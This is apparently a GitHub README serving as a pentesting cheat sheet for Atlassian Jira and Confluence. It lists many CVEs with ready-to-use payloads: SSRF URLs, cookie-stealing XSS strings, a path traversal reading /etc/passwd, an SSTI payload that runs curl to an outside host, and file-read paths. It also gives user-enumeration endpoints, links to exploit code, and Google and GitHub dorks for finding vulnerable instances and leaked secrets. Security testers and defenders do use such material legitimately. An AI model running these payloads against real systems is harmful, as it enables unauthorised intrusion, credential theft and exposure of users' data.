Skip to content

UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

35 Commits
 
 

Repository files navigation

Atlassian Jira Pentesting


CVE-2017-9506

https://blog.csdn.net/caiqiiqi/article/details/89017806

/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl

https://ecosystem.atlassian.net/browse/OAUTH-344 To exploit an SSRF vulnerability in confluence and I was able to perform several actions such as bypass any firewall/protection solutions, was able to perform XSPA through assessing the response times for ports, access Internal DoD Servers and internal services.

I discuss the vulnerabilities exploited in my write which you can find here, https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a

https://host/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json


CVE-2018-5230

https://hackerone.com/reports/380354 https://jira.atlassian.com/browse/JRASERVER-67289 HOW TO EXPLOIT: https://host/issues/?filter=-8 Go to the link above Click the "Updated Range:" text area Put your XSS payload in "More than [ ] minutes ago" (15 character payload limit) or in "In range [ ] to [ ]" (No length limit, ONLY put the payload in the first box) Click Update Payload will run. If it doesn't run chances are you used double quotes somewhere. Only use single quotes!


CVE-2019-3396 [Path Traversal & RCE]

POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: JIRA ...

{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler(.)com/v/23464dc5","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}


CVE-2019-3402 [Jira]XSS in the labels gadget

/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search ConfigurePortalPages.jspa


CVE-2019-3403 - user name enumeration throw information disclosure

Information disclosured vulnerability 1.()https://jira.atlassian.com/browse/JRASERVER-69242 visit the URL address,you can check the user whether is exist on this host /rest/api/2/user/picker?query=admin

So the attacker can enumerate all existing users on this jira server.


CVE-2019-8442 :- information disclosure

https://jira.atlassian.com/browse/JRASERVER-69241 visit the URL address,the server will leaking some server's information

/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml


CVE-2019-8449 - User enumeration through the groupuserpicker api resource (Vulnerable: Atlassian JIRA v2.1 ~ v8.3.4)

The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.

https://jira.atlassian.com/browse/JRASERVER-69796

https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true

Summary:

The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.

Vulnerable endpoint:

https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true by manipulating query= you can enumerate groups/users

Impact:

Information disclosure

Links:

https://github.com/mufeedvh/CVE-2019-8449

https://jira.atlassian.com/browse/JRASERVER-69796

https://nvd.nist.gov/vuln/detail/CVE-2019-8449

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8449

https://www.cvedetails.com/cve/CVE-2019-8449/


CVE-2019-8451:ssrf-response-body

The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.

https://jira.atlassian.com/browse/JRASERVER-69793?jql=labels%20%3D%20

PoC:

A request sent to http://vulnerablehost.com/plugins/servlet/gadgets/makeRequest?url=http://vulnerablehost.com@http://targethost.com will be redirected to targethost.com.

References:

https://unit42.paloaltonetworks.com/server-side-request-forgery-exposes-data-of-technology-industrial-and-media-organizations/


CVE-2019-11581 [SSTI]

http:///secure/ContactAdministrators!default.jspa #Try SSTI payload in subject and/or body:

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://xyz.burp(.)net').waitFor()

RCE Jira CVE-2019–11581

https://hackerone.com/reports/706841

/secure/ContactAdministrators!default.jspa


CVE-2020-14178: [Project Key Enum]

http:///browse.PROJECTKEY


CVE-2020-14179 :- Information disclosure

Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. https://jira.atlassian.com/browse/JRASERVER-71536 POC: https://victomhost/secure/QueryComponent!Default.jspa


CVE-2020-14181 :- Enumerate user via information disclosure

Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint.

Ref=https://jira.atlassian.com/browse/JRASERVER-71560?jql=text%20~%20%22cve-2020-14181%22 POC: https://victomhost/secure/ViewUserHover.jspa

https://victomhost/ViewUserHover.jspa?username=Admin


CVE-2018-20824 [Jira] XSS in WallboardServlet through the cyclePeriod parameter

/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true

Vulnerable to Server Side Request Forgery (SSRF).

This allowed a XSS and or a SSRF attack to be performed. More information about the Atlassian OAuth plugin issue see https://ecosystem.atlassian.net/browse/OAUTH-344 . When running in an environment like Amazon EC2, this flaw can used to access to a metadata resource that provides access credentials and other potentially confidential information.

https://victomhost/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)


CVE-2020-29453 - Pre-Auth Limited Arbitrary File Read

http://host/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

if its not running redirecting to login panel then run it with curl


CVE-2020-36287 [Atlassian JIRA: Incorrect Authorization]

Affected software: Atlassian Jira Data Center, Jira Server (also tested on Jira Project Management Software) Affected Vesrion: Before version 8.13.5, and from version 8.14.0 before version 8.15.1 CVEID: CVE-2020-36287 CVSS Score: 5.3 (Medium) CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Fully Patched Version: 8.13.5, 8.15.1, 8.16.0

Link: https://site.com/secure/Dashboard.jspa

POC: https://site.com/rest/dashboards/1.0/10000/gadget/{ID}/prefs

POC: https://github.com/f4rber/CVE-2020-36287

https://www.rapid7.com/db/vulnerabilities/atlassian-jira-cve-2020-36287/

https://jira.atlassian.com/browse/JRASERVER-72258 [Anonymously accessible Dashboards can leak private information via configured gadgets CVE-2020-36287]


CVE-2020-36289 [Atlassian Jira Unauth User Enumeration]

Vulnerable:

Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1

Summary:

The remote web server hosts a web application that is affected by an information disclosure vulnerability.

Affected endpoint:

https://example.com/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

Description:

The instance of Atlassian Jira hosted on the remote web server is affected by an information disclosure vulnerability in QueryComponentRendererValue!Default.jspa due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a specially crafted HTTP request, to disclose sensitive information which may aid in further attacks.

Solution:

Upgrade to Atlassian Jira version 8.5.15 / 8.13.1 / 8.17.0 or later.

References:

https://jira.atlassian.com/browse/JRASERVER-71559

http://www.nessus.org/u?b658a05a


CVE-2021-26084 - Confluence Server Webwork OGNL Injection

Description:

CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability in the Atlassian Confluence Webwork implementation. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to vulnerable endpoints on the Confluence Server or Data Center instance. Successful exploitation would allow an attacker to execute arbitrary code.

Vulnerable:

According to Atlassian’s official description, the company has released updates for versions 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0. That leaves CVE-2021-26084 exploitable on Confluence Server versions preceding 6.13.23, from 6.14.0 to 7.4.11, from 7.5.0 to 7.11.6, and from 7.12.0 to 7.12.5. This vulnerability does not affect Confluence Cloud users.

Exploit:

https://github.com/march0s1as/CVE-2021-26084

References:

https://www.tenable.com/blog/cve-2021-26084-atlassian-confluence-ognl-injection-vulnerability-exploited-in-the-wild


CVE-2021-26086 - Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include

PoC:

/_/;/WEB-INF/web.xml

/_/;/WEB-INF/decorators.xml

/_/;/WEB-INF/classes/seraph-config.xml

/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties

/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml

/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

/_/%3B/WEB-INF/web.xml

/_/%3B/WEB-INF/decorators.xml

/_/%3B/WEB-INF/classes/seraph-config.xml

/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties

/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml

/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

References:

https://cloudsek.com/threatintelligence/jira-software-server-cve-2021-26086-vulnerability-actively-exploited-in-the-wild

https://github.com/ColdFusionX/CVE-2021-26086

https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/jira_cve_2021-26086.txt


CVE-2022-26135 - Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server

https://github.com/assetnote/jira-mobile-ssrf-exploit


CVE-2022-0540 - Atlassian Jira Authentication Bypass

Description:

A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.

Vulnerable endpoint: /secure/WBSGanttManageScheduleJobAction.jspa;

https://github.com/Pear1y/CVE-2022-0540-RCE

https://bugalert.org/content/notices/2022-04-20-jira.html

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://nvd.nist.gov/vuln/detail/CVE-2022-0540

https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20


Username and email diclosure

https://host/secure/popups/UserPickerBrowser.jspa


jira-unauthenticated-dashboards

https://victomhost/rest/api/2/dashboard?maxResults=100

jira-unauth-popular-filters https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular


jira-unauth-popular-filters

https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular https://hackerone.com/reports/197726 https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=popular https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=search

https://hackerone.com/reports/139970

https://host/secure/ConfigurePortalPages!default.jspa?view=popular https://host/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false


XSS

/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm


jira-unauthenticated-dashboards:

https:///rest/api/2/dashboard?maxResults=10


jira-unauth-popular-filters:

https:///secure/ManageFilters.jspa?filterView=popular


Username and email diclosure

https://host/secure/popups/UserPickerBrowser.jspa


Check Privileges:

Inside a Jira instance any user (even non-authenticated) can check its privileges in /rest/api/2/mypermissions or /rest/api/3/mypermissions . These endpoints will return your current privileges. If a non-authenticated user have any privilege, this is a vulnerability (bounty?). If an authenticated user have any unexpected privilege, this a a vuln.


Check non-authenticated privileges

curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'


Jira Unauthorized User Enumeration via UserPickerBrowser

Affected endpoint:

https://example.com/secure/popups/UserPickerBrowser.jspa

Description:

By default, it’s only accessible to authenticated users. This function is used to search for a user and assign them tasks. It is a complete list of every user’s username and email address. There are three standard user groups in Jira: Administrators, Jira Users, and Anyone. For one reason or another, an administrator may grant the ‘Anyone’ group access to this functionality. This grants anyone access to the function – even anonymous users.

Authorization:

There are a couple of settings in Jira that, when not configured properly, may disclose information about the application and its users. This information may aid an attacker in gaining access to the application. This information disclosure is the result of an authorization misconfiguration in Jira’s Global Permissions settings. Jira uses role-based authorization where users are assigned to groups, and groups are assigned to one or more of the global permissions below.

Jira System Administrators Jira Administrators Browse Users Create Shared Objects Manage Group Filter Subscriptions Bulk Changes

Configuration of global permissions is completely up to the application administrator. If they want to give Bob in accounting Jira System Administrators access, they can certainly do that. There are other less obvious configuration mistakes the results of which may be catastrophic.

Browse Users:

Upon discovering an instance of Jira, one of the first things I like to do is check for anonymous access to the user picker functionality located at /secure/popups/UserPickerBrowser.jspa

Fix:

1.Log in as a user with administrative privileges 2.Click on the options menu at the top right of the window 3.In the drop-down menu, Click System 4.On the left-hand side under Security click the Global permissions link 5.In the center screen under Jira Permissions the Browse Users permission should not contain the Anyone user group

Impact:

This information would be extremely useful in a more targeted password guessing or phishing campaign. If you can compromise an administrator account, all other users are effectively compromised. It’s best to assume that, no matter the security controls in place, at some point an attacker is going to find a way in. Therefore, storing sensitive information such as usernames, passwords is not recommended.

References:

https://medium.flatstack.com/misconfig-in-jira-for-accessing-internal-information-of-any-company-2f54827a1cc5 https://confluence.atlassian.com/adminjiraserver073/managing-global-permissions-861253290.html

Tools:

To automate retrival of emails/usernames, use https://github.com/NetSPI/JIG


Automated checks (scanners):

https://github.com/netspooky/jLoot

https://github.com/0x48piraj/Jiraffe

https://github.com/bcoles/jira_scan

https://github.com/MayankPandey01/Jira-Lens

[Jira-Lens is a Python Based vulnerability Scanner for JIRA. Jira is a proprietary issue tracking product developed by Atlassian that allows bug tracking and agile project management. This tool Performs 25+ Checks including CVE's and Multiple Disclosures on the Provided JIRA Instance.]


Google dork section

inurl:/plugins/servlet/wallboard/

(This will give all the Jira dashboard which might be vulnerable to XSS.) (Sensitive Data Exposure)

https://www.exploit-db.com/ghdb/6528

This is testing for confluence(Older version) Found CVE:-2018-20824

Created dork: inurl:"/plugins/servlet/Wallboard/"

EP:/?dashboardId=10102&dashboardId=10103&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=fadeZoom&random=false

https://twitter.com/hackersden_/status/1417573513859244032

Useful Jira dorks:

inurl:"dashboard.jspa"

inurl:xyz intitle:JIRA login

site:*/JIRA/login

intitle:"Log In JIRA" inurl:"8080:/login.jsp"

intext:"Welcome to JIRA" "Powered by a free Atlassian Jira community"

inurl:companyname intitle:JIRA login

inurl:visma intitle:JIRA login

intext:"Confluence" ext:jsp intitle:"Jira"

inurl:http://confluence. login.action

inurl:https://wiki. .com/confluence/

allinurl: /confluence/login.action?

intitle:dashboard-confluence

inurl:/ContactAdministrators!default.jspa

inurl:/secure/attachment/ filetype:log OR filetype:txt


Github recon

Github recon Via github dorks to find secret:-

"site[dot]com" send_keys

"site[dot]com" client_secret

"site[dot]com" jira/root password


Credits:

https://github.com/sushantdhopat/JIRA_testing

https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/jira

https://github.com/NetSPI/JIG - https://medium.flatstack.com/misconfig-in-jira-for-accessing-internal-information-of-any-company-2f54827a1cc5

https://pentestbook.six2dez.com/enumeration/webservices/jira

https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md (Jira Common Bugs)


About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published